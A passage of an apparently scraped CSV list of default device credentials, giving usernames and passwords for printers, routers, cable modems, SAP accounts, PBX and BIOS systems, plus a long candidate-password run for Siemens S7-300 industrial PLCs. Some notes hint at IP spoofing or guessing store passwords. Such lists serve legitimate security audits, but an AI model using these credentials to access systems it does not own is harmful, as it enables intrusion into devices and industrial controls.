during both steps.,\npromise,FastTrak TX4310,,HTTP,admin,admin,admin,,\npromise,FastTrak TX4310,,admin,admin,admin,,,\npromisetechnologyinc,WebPAM,,,administrator,password,,,\nprostar,1224,,,,4321,,,\nprostar,1224,,Other,,4321,,,\nprotocraft,authentic train whistle,,,musi1921,Musi%1921,,,\nproxicast,LAN-Cell Gateway GPRS-401,,,,1234,,,\nproxim,AP-2000,,,,public,,,\nproxim,AP-2000,,,,public,Admin,,\nproxim,AP-2000,,,,public,Admin,Default SSID = tsunami,\nproxim,ORINOCO AP-4000M,802.11A+B/G,http://192.168.1.52/,no se,no se ,no se,se me perdio el pass quiero recuperarlo,\nproxim,ORINOCO AP-4000M,802.11A+B/G,http://192.168.1.52/,no se,no se,no se,se me perdio el pass quiero recuperarlo,\nproxim,ORiNOCO AP-600,,http://169.254.128.132,,public,Administration,,\nproxim,ORiNOCO AP-600,all version,192.168.0.2,,,admin,,\nproxim,ORiNOCO AP-700,,http://169.254.128.132,,public,Administration,,\nproxim,Orinoco 600/2000,All,HTTP,,,Admin,WLAN accesspoint,\nproxim,Orinoco AP-4000,802.11a/b/g,http://192.168.1.4/,,,admin,,\nproxim,Tsunami MP.11 5054-R SN-07UT08570142,v2.5.1(215) ,TELNET/HTTP,,public,admin,,\nproxim,Tsunami MP.11 5054-R SN-07UT08570142,v2.5.1(215),TELNET/HTTP,,public,admin,,\nprtg,PRTG Network Monitor,,,prtgadmin,prtgadmin,,,\npsionteklogix,9150,,HTTP,support,h179350,Admin,,\npyramid computer,BenHur,,Admin,admin,admin,,,\npyramid computer,BenHur,,Admin,admin,gnumpf,,,\npyramid computer,BenHur,,all,admin,admin,,,\npyramidcomputer,BenHur,all,HTTP,admin,admin,Admin,,\npyramidcomputer,BenHur,all,HTTP,admin,gnumpf,Admin,,\nqdi,Broadband Gateway 100,,,,password,,,\nqdi,Broadband Gateway 100,,Admin,,password,,,\nqdi,Broadband Gateway 100,,Telnet/HTTP,,password,Admin,,\nqdi,PC BIOS,,,,QDI,,,\nqdi,PC BIOS,,Admin,,QDI,,,\nqdi,PC BIOS,,Console,,QDI,Admin,,\nqdi,SpeedEasy BIOS,,,,lesarotl,,,\nqdi,SpeedEasy BIOS,,Admin,,lesarotl,,,\nqdi,SpeedEasy BIOS,,Console,,lesarotl,Admin,,\nqtec,790RH,,,Admin,,,,\nqtec,790RH,,http://192.168.1.1,Admin,,Administration,,\nquake,Quake Server,,,,tms,,rcon password; appears to require that you masquerade as 192.246.40.* to use,\nqualiteam,X-Cart,,,master,master,,,\nquantex,PC BIOS,,,,xljlbj,,,\nquantex,PC BIOS,,Admin,,teX1,,,\nquantex,PC BIOS,,Admin,,xljlbj,,,\nquantex,PC BIOS,,Console,,teX1,Admin,,\nquantex,PC BIOS,,Console,,xljlbj,Admin,,\nquantum,File Servers,,Most of them,,,,,\nquantum,File Servers,,User,,,,,\nquantum,File Servers,Most of them,HTTP,,,User,,\nquestra,IDM Application Suite,,,guest,guest,,,\nquestra,IDM Application Suite,,,questra,questra,,,\nquickeagle,DL700 ADSL2+,,192.168.1.254,admin,admin,Admin,,\nquickeagle,DL710 ADSL2+,,192.168.1.254,admin,admin,Admin,,\nquintumtechnologiesinc,Tenor Series,all,Multi,admin,admin,Admin,,\nradio shack,TAD-1004,,keypad,,744,,,\nradioshack,In-Store Demo PC Windows Screen Savers,,,,,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nradioshack,In-Store Demo PC Windows Screen Savers,,,,RS,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nradioshack,In-Store Demo PC Windows Screen Savers,,,,RSlt;Store Numbergt;,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nradioshack,In-Store Demo PC Windows Screen Savers,,,,lt;Store Numbergt;,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nradioshack,TAD-1004,,Multi,,744,keypad,,\nradware,Linkproof,,ssh,lp,lp,Admin,,\nradware,Linkproof,3.73.03,Multi,radware,radware,Admin,,\nradware,Scopia,,,Administrator,1234,,,\nradware,Scopia,,,User,1234,,,\nraidzone,raid arrays,,,,raidzone,,,\nrainbow,IKEY 1000,,,,rainbow,Admin,,\nrainbow,IKEY 1000,,,,rainbow,Admin,password=pin,\nrainbow,IKEY 2000,,,,PASSWORD,,,\nrainbow,IKEY,,1000,,rainbow,,,\nrainbow,IKEY,,2000,,PASSWORD,,,\nrainerwichmann,Beltane,,,rainer,wichmann,,,\nramp networks,WebRamp,,,wradmin,trancell,,,\nrampnetworks,WebRamp,,,wradmin,trancell,,,\nrapidstream,RS4000-RS8000,,,rsadmin,rsadmin,,Linux,\nrapidstream,RapidStream Appliances,,,rsadmin,,,,\nraritan,KVM Switches,,,admin,raritan,,,\nraritan,KVM Switches,,,admin,raritan,Admin,,\nraritan,Power IQ,,,admin,raritan,,,\nraritan,Power IQ,,,epiq_api,raritan,,,\nraritan,Power IQ,,,web_api,sl33p30F00dumass!,,,\nraytalk,RB-300,,,root,root,,,\nraytalk,RB-300,,,root,root,Admin,,\nrca,DCW615R,,,,admin,,,\nrca,DCW615R,,http://192.168.100.1 or http://192.168.0.1,,admin,Administration,,\nredhat,Redhat 6.2,,,piranha,piranha,,,\nredhat,Redhat 6.2,,,piranha,q,,,\nredhat,Redhat 6.2,,HTTP,piranha,piranha,User,,\nredhat,Redhat 6.2,,HTTP,piranha,q,User,,\nredhat,Redhat 6.2,,User,piranha,piranha,,,\nredhat,Redhat 6.2,,User,piranha,q,,,\nredline,,,,user,user,192.168.25.2,,\nredline,an50,,,admin,admin,,,\nredline,an50,02.02,Multi,admin,admin,,,\nredline,an50,2.02,Multi,admin,admin,,,\nremedy,Remedy,,,ARAdmin,AR#Admin#,,,\nremedy,Remedy,,Multi,Demo,,,,\nremedy,Remedy,,multi,ARAdmin,AR#Admin#,Admin,,\nremedy,Remedy,,multi,Demo,,,,\nresearch machines,Classroom Assistant,,,manager,changeme,,,\nresearch,PC BIOS,,,,Col2ogro2,,,\nresearch,PC BIOS,,Admin,,Col2ogro2,,,\nresearch,PC BIOS,,Console,,Col2ogro2,Admin,,\nresearchmachines,Classroom Assistant,,,manager,changeme,,Windows 95,\nresumix,Resumix,,,root,resumix,,,\nricoh,1013F,,,,sysadm,,,\nricoh,1022,1.75,,admin,admin,,,\nricoh,1224c,,http,,password,,,\nricoh,1232c,-,http,admin,password,admin,,\nricoh,1301f,,,,sysadm,,,\nricoh,2035e,,web,admin,password,,no entry ta administrator,\nricoh,2060,,,admin,admin,,,\nricoh,2060,,HTTP,admin,,Admin,,\nricoh,2500,,,admin,blank,admin,,\nricoh,3235c,,192.168.0.76,admin,,ad,lype,\nricoh,3245C,,,admin,blank,admin,,\nricoh,4430NF,,10.226.5.1,admin,,Admin,,\nricoh,650,,,,sysadm,http,,\nricoh,AP410N,1.13,HTTP,admin,,Admin,,\nricoh,AP610N,,telnet,admin,,admin,,\nricoh,Aficio 1013 1515 2013 120,,,sysadm,sysadm,,,\nricoh,Aficio 1022,,,Admin,password,,,\nricoh,Aficio 1027,,http://,admin,password,admin,,\nricoh,Aficio 1045,,HTTP,admin,password,,,\nricoh,Aficio 2015,,http,admin,password,,,\nricoh,Aficio 2018D,,http,admin,password,Admin,,\nricoh,Aficio 2020D,,HTTP,admin,password,Admin,,\nricoh,Aficio 2022,1.04,http,admin,password,admin,,\nricoh,Aficio 2035,,,sisadm,password,,,\nricoh,Aficio 2045e,,http,admin,password,Admin,,\nricoh,Aficio 2075,,,admin,,Admin,,\nricoh,Aficio 2228c,,Multi,sysadmin,password,Admin,Webpage admin,\nricoh,Aficio 2232C,,Telnet,,password,Admin,,\nricoh,Aficio 3025,,,admin,,Admin,,\nricoh,Aficio 3035,,,admin,,Admin,,\nricoh,Aficio 3228,,,admin,,Admin,,\nricoh,Aficio AP3800C,2.17,HTTP,,password,Admin,alternative to sysadmin and Admin,\nricoh,Aficio MP 161,,telnet http,admin,,,,\nricoh,Aficio MP 161,windows xp,USB,,,,,\nricoh,Aficio MP 171,,http or telnet,admin,,,,\nricoh,Aficio MP 2000,,,admin,,root acces,,\nricoh,Aficio MP 2500,1.03,HTTP,admin,,Administrator,,\nricoh,Aficio MP 2510,all versions,http://192.168.0.92,,000000,,,\nricoh,Aficio MP 2550,,web interface,admin,,admin,,\nricoh,Aficio MP 2851,,,admin,,,,\nricoh,Aficio MP 3350,,,admin,,administrator,,\nricoh,Aficio MP 4500,,,admin,,,,\nricoh,Aficio MP 5500,2.08,Telnet / HTTP,admin,,Admin,,\nricoh,Aficio MP 8001,all,http,admin,,,,\nricoh,Aficio MP C2050,,,admin,,Administrator,,\nricoh,Aficio MP C2051,,http,admin,,,,\nricoh,Aficio MP C2800,,,admin,,,,\nricoh,Aficio MP C4000,,,admin,,,,\nricoh,Aficio MP C4500,,HTTP,admin,,admin,,\nricoh,Aficio MP printers,,,admin,no password,,,\nricoh,Aficio MPC305,1.11.1,Web Server,admin,,Administrator,,\nricoh,Aficio MPC5501,,,admin,,Admin,,\nricoh,Aficio SP 3500SF,,,,admin,,,\nricoh,Aficio SP 4210N,,Web Interface,admin,,,,\nricoh,Aficio SP C220N,,,aucun,aucun,,,\nricoh,Aficio SP C220N,,http,Admin,,,case sensitive must have upper case A,\nricoh,Aficio SP C220N,,http://192.168.0.135,,,,,\nricoh,Aficio SP C231N,,web,Admin,,Administrator,Logon name CASE SENSITIVE,\nricoh,Aficio SP4100N,,,admin,,Administator account,,\nricoh,Aficio,1515,http,administrator,password,administrator access,,\nricoh,Aficio,2027,,admin,password,,,\nricoh,Aficio,AP3800C,HTTP,sysadmin,password,Admin,,\nricoh,Aficio,CL100N,Web,admin,password,,,\nricoh,Aficioh,,Administrator,admin,,,,\nricoh,Africo MP 161,,Telnet/HTTP,admin,,Administrator,,\nricoh,All MP and MPC,,Console,Supervisor,,,To change admin password,\nricoh,C231N,,,Admin,password,,A must be capitalized in username,\nricoh,CL2000N,,,admin,password,,,\nricoh,CL3500N,,GUI,admin,leave blank,,,\nricoh,DSC338 Printer,1.19,HTTP,,password,Admin,no user,\nricoh,MFP 2550,,web interface,admin,,admin,,\nricoh,MP 161SPF,,Http://,admin,,,,\nricoh,MP 171,1,http://192.168.126.70/,admin,,admin,,\nricoh,MP 2001SP/MP 2501SP,1.00,\\\\192.168.0.227,,,,,\nricoh,MP 2550 printer,,,admin,no password,,,\nricoh,MP 7500,2.02.1,HTTP,admin,,Admin,Webpage admin,\nricoh,MP 9000,,,admin,sem senha,webpage,somente as de fabrica se colocar ela criptografa,\nricoh,MP 9000,,,admin,sem senha,webpage,somente as de fabrica,\nricoh,MP C2003,,Web,admin,,Admin,,\nricoh,MP C3300,,http://copier-ip,admin,,Admin,,\nricoh,MP C4000,,http,admin,,Admin Access,,\nricoh,MP C5000,,,admin,password,web,admin,\nricoh,MP C6000,,HTTP,admin,N/A,Web admin,,\nricoh,MP4000,,web,admin,,,,\nricoh,NRG MP-301,,http://157.88.149.100,admin,odim,,,\nricoh,SP 4100N,,web interface,admin,,,leave password black,\nricoh,SP 4100N,All,Web,supervisor,,Allow change of admin password,,\nricoh,SP C232DN,,,Admin,password,,note A is capitalized,\nricoh,SP C311N,,HTTP,Admin,,Config.-Admin,Username is case-sensitive,\nricoh,SP C311N,,http,Admin,,,,\nricoh,SP C311N,,http,Admin,password,,,\nricoh,SPC232,all versions,http,Admin,,admin,,\nricoh,afcio mp 161,,telnet http,admin,,,,\nricoh,aficio 3045,1.38,console,admin,,admin,,\nricoh,aficio 3224c,all models,,http://192.168.1.104,admin,420008,admin,reset password\nricoh,aficio 650 windows xp,all versions,http//192.168.1.4,,,admin,,\nricoh,aficio,1027,192.168.1.44,admin,admin,,,\nriverbed,Acelerador,,http,Admin,password,,,\nrizen,WebGUI,,,Admin,123qwe,,,\nrizen,WebGUI,,,Admin,123qwe,Admin,,\nrm,RM Connect,,,RMUser1,password,,,\nrm,RM Connect,,,admin,rmnetlm,,,\nrm,RM Connect,,,admin2,changeme,,,\nrm,RM Connect,,,adminstrator,changeme,,,\nrm,RM Connect,,,deskalt,password,,,\nrm,RM Connect,,,deskman,changeme,,,\nrm,RM Connect,,,desknorm,password,,,\nrm,RM Connect,,,deskres,password,,,\nrm,RM Connect,,,guest,,,,\nrm,RM Connect,,,replicator,replicator,,,\nrm,RM Connect,,,setup,changeme,,,\nrm,RM Connect,,,teacher,password,,,\nrm,RM Connect,,,temp1,password,,,\nrm,RM Connect,,,topicalt,password,,,\nrm,RM Connect,,,topicnorm,password,,,\nrm,RM Connect,,,topicres,password,,,\nrm,RM Connect,,Main Login,PROPAGATE,APPLICATION,Full,used in school,\nrm,RM Connect,,Multi,RMUser1,password,,,\nrm,RM Connect,,Multi,admin,rmnetlm,,,\nrm,RM Connect,,Multi,admin2,changeme,,,\nrm,RM Connect,,Multi,adminstrator,changeme,,,\nrm,RM Connect,,Multi,deskalt,password,,,\nrm,RM Connect,,Multi,deskman,changeme,,,\nrm,RM Connect,,Multi,desknorm,password,,,\nrm,RM Connect,,Multi,deskres,password,,,\nrm,RM Connect,,Multi,guest,,,,\nrm,RM Connect,,Multi,replicator,replicator,,,\nrm,RM Connect,,Multi,setup,changeme,,,\nrm,RM Connect,,Multi,teacher,password,,,\nrm,RM Connect,,Multi,temp1,password,,,\nrm,RM Connect,,Multi,topicalt,password,,,\nrm,RM Connect,,Multi,topicnorm,password,,,\nrm,RM Connect,,Multi,topicres,password,,,\nrm,RM Connect,,Propagating!,PROPAGATE,APPLICATION,Full,used in school,\nrm,Server BIOS,,,,RM,,,\nrm,Server BIOS,,Console,,RM,,,\nrm,computer,,Other,administrator,password/changeme or secret,l:/ and take of restrictions,,\nrnn,RNN's Guestbook,1.2,http,admin,demo,Admin,,\nrnn,RNN's Guestbook,1.2,http,admin,demo,Admin,stored in plaintext in gbpass.pl,\nroamabout,RoamAbout R2 Wireless Access Platform,,Multi,admin,password,Admin,,\nrodopi,Rodopi billing software 'AbacBill' sql database,,,rodopi,rodopi,,,\nrodopi,Unknown,,,Rodopi,Rodopi,,,\nrsa,Access Manager,,,admin,admin1234,,,\nrsa,Cleartrust,,,admin,admin1234,,,\nsafecom,Router,,,admin,epicrouter,,,\nsafecom,Router,,Admin,admin,epicrouter,,,\nsafecom,Router,,Multi,admin,epicrouter,Admin,,\nsagem,F@ST ,2404,Telnet , SSH , HTTP,admin,administrator,\nsagem,Fast 1200 (F@ST 1200),,Telnet,root,1234,User,root/1234,\nsagem,Fast 1200 (Fast 1200),,Telnet,root,1234,User,root/1234,\nsagem,Fast 1201 (F@ST 1201),,192.168.1.1,admin,admin,Admin,,\nsagem,Fast 1201 (F@ST 1201),Optus version,10.1.1.1,,,Admin,,\nsagem,Fast 1400 (F@ST 1400),,Multi,admin,epicrouter,Admin,,\nsagem,Fast 1400,,Multi,admin,epicrouter,Admin,,\nsagem,Fast 1400w (F@ST 1400w),,Multi,root,1234,Admin,,\nsagem,Fast 1400w,,Multi,root,1234,Admin,,\nsagem,Fast 2404 (F@ST 2404),,Telnet,admin,admin,admin,The default password for sagem f@st 2404 routers (also a lot of other sagem fast versions 1200/1240/1400/1400W/1500/1500-WG ),\nsagem,Fast 2604 (F@ST 2604),253124416,multi,user,user,user,,\nsambar technologies,Sambar Server,,,admin,,,,\nsambar technologies,Sambar Server,,,anonymous,,,,\nsambar technologies,Sambar Server,,,billy-bob,,,,\nsambar technologies,Sambar Server,,,ftp,,,,\nsambar technologies,Sambar Server,,,guest,guest,,,\nsambartechnologies,Sambar Server,,http,admin,,Admin,,\nsambartechnologies,Sambar Server,,http,anonymous,,,,\nsambartechnologies,Sambar Server,,http,billy-bob,,,,\nsambartechnologies,Sambar Server,,http,ftp,,Admin,,\nsambartechnologies,Sambar Server,,http,guest,guest,Admin,,\nsamsung,AHT-E300,Multi,admin,password,Admin,,,\nsamsung,AHT-E300,Multi,admin,password,Admin,,after reset,\nsamsung,CLP-325W,,,admin,sec00000,Admin,,\nsamsung,CLX-3300,,HTTP,admin,sec00000,,,\nsamsung,CLX-4195FW,,,admin,sec00000,,,\nsamsung,E700,,Password,Moeketsik,874434,,,\nsamsung,G2512,PASSWORD,,SAMSUNG,123456,123456,DEFICULT,\nsamsung,N620,,Multi,,,Admin,,\nsamsung,Printers,,,,s!a@m#n$p%c,,,\nsamsung,SCX-4726,,HTTP,admin,sec00000,Admin,,\nsamsung,SGH E700,,,,874434,User,Sms,\nsamsung,SGH E700,,,Samsung,,,Sms,\nsamsung,SWL-3500RG,2.15,HTTP,public,public,Admin,def. WEP keys: 0123456789 1518896203,\nsamuel abels,Ammerum,,0.6-1,user,password,,,\nsamuelabels,Ammerum,0.6-1,,user,password,,,\nsap,Axis2,,,admin,axis2,,,\nsap,Business Connector,,4.7,Administrator,manage,,,\nsap,Business Connector,,4.7,Developer,isdev,,,\nsap,Business Connector,,4.7,Replicator,iscopy,,,\nsap,Business Connector,4.7,,Administrator,manage,Admin,,\nsap,Business Connector,4.7,,Developer,isdev,Admin,,\nsap,Business Connector,4.7,,Replicator,iscopy,Admin,,\nsap,ITS,,,itsadmin,init,,,\nsap,SAP Local Database,,,SAPR3,SAP,,,\nsap,SAP,,,DDIC,19920706,,,\nsap,SAP,,,EARLYWATCH,SUPPORT,,,\nsap,SAP,,,SAP*,7061992,,,\nsap,SAP,,,SAPCPIC,ADMIN,,,\nsap,SAP,,000 001 066,SAP*,06071992,,,\nsap,SAP,,000 001,DDIC,19920706,,,\nsap,SAP,,000,SAPCPIC,ADMIN,,,\nsap,SAP,,066,EARLYWATCH,SUPPORT,,,\nsap,SAP,,Admin,SAPCPIC,ADMIN,,,\nsap,SAP,,Mandant 066,SAP,SAP internal,,,\nsap,SAP,,R/3,DDIC,19920706,,,\nsap,SAP,,R/3,EARLYWATCH,SUPPORT,,,\nsap,SAP,,R/3,SAP*,06071992,,,\nsap,SAP,,R/3,SAPCPIC,ADMIN,,,\nsap,SAP,,R/3,TMSADM,,,,\nsap,SAP,,SAP internal,DDIC,19920706,,,\nsap,SAP,,SAP internal,EARLYWATCH,SUPPORT,,,\nsap,SAP,,SAP internal,SAP*,07061992,,,\nsap,SAP,,SAP internal,SAP*,PASS,,,\nsap,SAP,R/3,,SAP*,06071992,,,\nsap,SAP,R/3,,SAP*,6071992,,,\nsap,SAP,R/3,,TMSADM,,,,\nsap,SAP,R/3,SAP client,DDIC,19920706,SAP internal; Mandant 001,,\nsap,SAP,R/3,SAP client,EARLYWATCH,SUPPORT,SAP internal; Mandant 066,,\nsap,SAP,R/3,SAP client,SAP*,07061992,SAP internal; Mandant 066,,\nsap,SAP,R/3,SAP client,SAP*,7061992,SAP internal; Mandant 066,,\nsap,SAP,R/3,SAP client,SAP*,PASS,SAP internal; all Mandants,,\nsap,SAP,R/3,SAP client,SAPCPIC,ADMIN,Admin,,\nsavin,C2525,,HTTP,admin,blank,Admin,,\nschneider electric,PowerLogic Ethernet Communications Card,,,,admin,,,\nschneiderelectric,ETZ 410\\510 Module,,,USER,USER,,,\nschneiderelectric,FactoryCast Quantum\\Premium PLC Management,,,USER,USER,,,\nschneiderelectric,FactoryCast Quantum\\Premium PLC Management,,,ntpupdate,ntpupdate,,,\nschneiderelectric,PowerLogic ethernet card,,http,,admin,Admin,,\nschneiderelectric,Quantum NOE 771 xx Ethernet Module,,,USER,USER,,,\nscientificatlanta,,,http://192.168.100.1,CARMEN,,ROOT,,\nscientificatlanta,001BD7FF92D4,comcast-supplied,192.168.100.1,admin,w2402,diagnostics page,192.168.100.1,\nscientificatlanta,2100,comcast-supplied,http,admin,w2402,diagnostics page,192.168.100.1,\nscientificatlanta,2320,,http://192.168.0.1./,admin,W2402,,,\nscientificatlanta,2320,,http://192.168.100.1,,,,,\nscientificatlanta,93209215,CABLE MODEM / EMTA,http://192.168.0.1,,admin,Admin,,\nscientificatlanta,93209215,CABLE MODEM / EMTA,http://192.168.0.1,admin,password,Admin,,\nscientificatlanta,93209215,Webstar DPC2434,192.168.0.1,admin,w2402,admin,,\nscientificatlanta,D/EPC2100,,,admin,W2402,,search in google for more info,\nscientificatlanta,DPC2203 windows 7,1,192.168.100.1,,,admin,,\nscientificatlanta,DPC2203,1.1,http://192.168.0.1,admin,W2403,Admin,,\nscientificatlanta,DPR2325R3,3,192.168.0.1,admin,W2402,Admin,,\nscientificatlanta,DPR2325R3,3.0,,,,admin,,\nscientificatlanta,DPR2325R3,3.0,192.168.0.1,admin,W2402,Admin,,\nscientificatlanta,DPX2100,Comcast-supplied,HTTP,admin,w2402,diagnostics page,192.168.100.1,\nscientificatlanta,EPC-2203,1,http://192.168.100.1/_aslvl.asp,admin,W2402,Change level 2,,\nscientificatlanta,EPC2100,all versions,http://192.168.0.1,,,admin,,\nscientificatlanta,EPC2100R2,HW Rev 2.1,modem,,,admin,,\nscientificatlanta,EPC2505,1,http://192.168.100.1,admin,W2402,status,,\nscientificatlanta,EPC2505,1.0,http://192.168.100.1,admin,W2402,status,,\nscientificatlanta,EPR2320R2,2,192.168.0.1,,Admin,,,\nscientificatlanta,EPR2320R2,2.0,192.168.0.1,,Admin,,,\nscientificatlanta,EPR2320R2,2.0,http://192.168.100.1,WebSTAR,,Access by everyone,Default password,\nscientificatlanta,EPR2320R2,v2.0.2r1262-070212,192.168.0.1,admin,admin,admin,nao consigo entra no router,\nscientificatlanta,EPR2325R3,3,http://192.168.100.1,admin,admin,admin,,\nscientificatlanta,EPR2325R3,3.0,http://192.168.100.1,admin,admin,admin,,\nscientificatlanta,SERVICE ELECTRIC CABLE (SECABLE),SERVICE ELECTRIC CABLE (SECABLE),http://192.168.100.1/,admin,W2402,Status,Status Page,\nscientificatlanta,WebSTAR EPC2100R2, 2.0,192.168.100.1,Sremac,b29a03t19a87ja,rasalav,,\nscientificatlanta,WebSTAR EPC2100R2,2,192.168.100.1,Sremac,b29a03t19a87ja,rasalav,,\nscientificatlanta,epr2325r3,all,http://192.168.100.1/,,,Admin,,\nseagullscientific,Track'Em,,,ADMIN,admin,Admin,,\nseagullscientific,Track'Em,,,USER,USER,Admin,,\nseclore,FileSecure,,,root,changeonfirstlogin,,,\nseclore,FileSecure,,,sa,changeonfirstlogin,,,\nsecuricor3net,Cezanne,,,manager,friend,,,\nsecuricor3net,Cezzanne,,,manager,friend,,any,\nsecuricor3net,Monet,,,manager,friend,,any,\nsecurity.org,lockpicking,,,admin,,,,\nsecurstar,ikey,,admin,admin,rainbow,,,\nsecurstar,ikey,1000,Multi,admin,rainbow,admin,,\nsemaphore,PICK O/S,,,DESQUETOP,,,,\nsemaphore,PICK O/S,,,DS,,,,\nsemaphore,PICK O/S,,,DSA,,,,\nsemaphore,PICK O/S,,,PHANTOM,,,,\nsenao,2611CB3+D (802.11b Wireless AP),,HTTP,admin,,Admin,Default IP: 192.168.1.1,\nserver technology,Sentry Remote Power Manager,,,ADMN,admn,,,\nserver technology,Sentry Remote Power Manager,,,GEN1,gen1,,,\nserver technology,Sentry Remote Power Manager,,,GEN2,gen2,,,\nserver technology,Sentry Remote Power Manager,,Admin,ADMN,admn,,,\nserver technology,Sentry Remote Power Manager,,view/control,GEN1,gen1,,,\nserver technology,Sentry Remote Power Manager,,view/control,GEN2,gen2,,,\nservertechnology,Sentry Remote Power Manager,,Multi,ADMN,admn,Admin,Telnet port 2001,\nservertechnology,Sentry Remote Power Manager,,Multi,GEN1,gen1,view/control,Telnet port 2001,\nservertechnology,Sentry Remote Power Manager,,Multi,GEN2,gen2,view/control,Telnet port 2001,\nseyeon,FlexWATCH,,,root,root,,,\nsgi,Embedded Support Partner,,,Administrator,Partner,,IRIX 6.5.6,\nsgi,IRIX,,,EZsetup,,,ALL,\nsgi,IRIX,,,lp,lp,,ALL,\nsgi,all,,,root,,,all,\nsharp,AR-201,,http,,sysadm,,,\nsharp,AR-280,,Full,,sysadm,,,\nsharp,AR-280,,HTTP,,sysadm,Full,,\nsharp,AR-336,,HTTP,,sysadm,admin,,\nsharp,AR-336,,admin,,sysadm,,,\nsharp,AR-407/S402 ,,Multi,,,Admin,,\nsharp,AR-407/S402,,Multi,,,Admin,,\nsharp,AR-M205,,Web,admin,Sharp,full,,\nsharp,AR-M257,,WEB Interface,admin,Sharp,,,\nsharp,AR-M355N,,,admin,Sharp,Admin,,\nsharp,AR-M550,,,admin,Sharp,HTTP,,\nsharp,AR507/S507,,HTTP,,sysadm,,,\nsharp,FO-2081,,,admin,Sharp,Admin,,\nsharp,MX-2600N,,,,admin,,,\nsharp,MX-4501N,,HTTP,Administrator,admin,,,\nsharp,MX-5111N,,http,admin,admim,,,\nsharp,MX-M850,,,administrator,admin,,,\nsharp,MX-M850,,HTTP,admin,admin,,,\nshiva,AccessPort,,,hello,hello,,,\nshiva,AccessPort,,,hello,hello,,Any,\nshiva,Any?,,,Guest,blank,,,\nshiva,Integrator,,Admin,admin,hello,,,\nshiva,Integrator,150/200/500,Multi,admin,hello,Admin,,\nshiva,LanRover,,,guest,,,,\nshiva,LanRover,,,root,,,,\nshiva,ShivaPort,,console,admin,hello,Admin,,\nshoretel,Conference Bridge,,,Admin,admin1,,,\nshoretel,ShoreTel Call Manager,,,admin,changeme,,,\nshoretel,ShoreWare Director,,,admin,changeme,,,\nshuttle,PC BIOS,,,,Spacve,,,\nshuttle,PC BIOS,,,,Spacve,Admin,,\nshuttle,PC BIOS,,Admin,,Spacve,,,\nsiemens nixdorf,Hicom 100E PBX,,,31994,31994,,,\nsiemens nixdorf,Hicom 150E PBX,,,31994,31994,,,\nsiemens nixdorf,PBX,,8818,,uboot,,,\nsiemens nixdorf,PC BIOS,,,,SKY_FOX,,,\nsiemens nixdorf,PC BIOS,,Admin,,SKY_FOX,,,\nsiemens nixdorf,PhoneMail,,,poll,poll,,,\nsiemens nixdorf,PhoneMail,,,sysadmin,sysadmin,,,\nsiemens nixdorf,PhoneMail,,,system,system,,,\nsiemens nixdorf,PhoneMail,,,tech,tech,,,\nsiemens nixdorf,ROLM PBX,,,admin,pwp,,,\nsiemens nixdorf,ROLM PBX,,,eng,engineer,,,\nsiemens nixdorf,ROLM PBX,,,op,operator,,,\nsiemens nixdorf,ROLM PBX,,,su,super,,,\nsiemens s7-300,,,,,!MANAGE,,,\nsiemens s7-300,,,,,!manage,,,\nsiemens s7-300,,,,,$secure$,,,\nsiemens s7-300,,,,,'''''''',,,\nsiemens s7-300,,,,,''''''',,,\nsiemens s7-300,,,,,'''''',,,\nsiemens s7-300,,,,,''''',,,\nsiemens s7-300,,,,,'''',,,\nsiemens s7-300,,,,,''',,,\nsiemens s7-300,,,,,'',,,\nsiemens s7-300,,,,,',,,\nsiemens s7-300,,,,,********,,,\nsiemens s7-300,,,,,*******,,,\nsiemens s7-300,,,,,******,,,\nsiemens s7-300,,,,,*****,,,\nsiemens s7-300,,,,,****,,,\nsiemens s7-300,,,,,***,,,\nsiemens s7-300,,,,,**,,,\nsiemens s7-300,,,,,*,,,\nsiemens s7-300,,,,,++++++++,,,\nsiemens s7-300,,,,,+++++++,,,\nsiemens s7-300,,,,,++++++,,,\nsiemens s7-300,,,,,+++++,,,\nsiemens s7-300,,,,,++++,,,\nsiemens s7-300,,,,,+++,,,\nsiemens s7-300,,,,,++,,,\nsiemens s7-300,,,,,+,,,\nsiemens s7-300,,,,,,,,\nsiemens s7-300,,,,,,,,,\nsiemens s7-300,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,,,,,\nsiemens s7-300,,,,,-,,,\nsiemens s7-300,,,,,--,,,\nsiemens s7-300,,,,,---,,,\nsiemens s7-300,,,,,----,,,\nsiemens s7-300,,,,,-----,,,\nsiemens s7-300,,,,,------,,,\nsiemens s7-300,,,,,-------,,,\nsiemens s7-300,,,,,--------,,,\nsiemens s7-300,,,,,.,,,\nsiemens s7-300,,,,,..,,,\nsiemens s7-300,,,,,...,,,\nsiemens s7-300,,,,,....,,,\nsiemens s7-300,,,,,.....,,,\nsiemens s7-300,,,,,......,,,\nsiemens s7-300,,,,,.......,,,\nsiemens s7-300,,,,,........,,,\nsiemens s7-300,,,,,/,,,\nsiemens s7-300,,,,,//,,,\nsiemens s7-300,,,,,///,,,\nsiemens s7-300,,,,,////,,,\nsiemens s7-300,,,,,/////,,,\nsiemens s7-300,,,,,//////,,,\nsiemens s7-300,,,,,///////,,,\nsiemens s7-300,,,,,////////,,,\nsiemens s7-300,,,,,0,,,\nsiemens s7-300,,,,,00,,,\nsiemens s7-300,,,,,000,,,\nsiemens s7-300,,,,,0000,,,\nsiemens s7-300,,,,,00000,,,\nsiemens s7-300,,,,,000000,,,\nsiemens s7-300,,,,,0000000,,,\nsiemens s7-300,,,,,00000000,,,\nsiemens s7-300,,,,,00000001,,,\nsiemens s7-300,,,,,0000001,,,\nsiemens s7-300,,,,,000001,,,\nsiemens s7-300,,,,,00001,,,\nsiemens s7-300,,,,,0001,,,\nsiemens s7-300,,,,,001,,,\nsiemens s7-300,,,,,050952,,,\nsiemens s7-300,,,,,0P3N,,,\nsiemens s7-300,,,,,1,,,\nsiemens s7-300,,,,,100,,,\nsiemens s7-300,,,,,1000,,,\nsiemens s7-300,,,,,10000,,,\nsiemens s7-300,,,,,100000,,,\nsiemens s7-300,,,,,1000000,,,\nsiemens s7-300,,,,,10000000,,,\nsiemens s7-300,,,,,10041979,,,\nsiemens s7-300,,,,,1064,,,\nsiemens s7-300,,,,,11,,,\nsiemens s7-300,,,,,111,,,\nsiemens s7-300,,,,,1111,,,\nsiemens 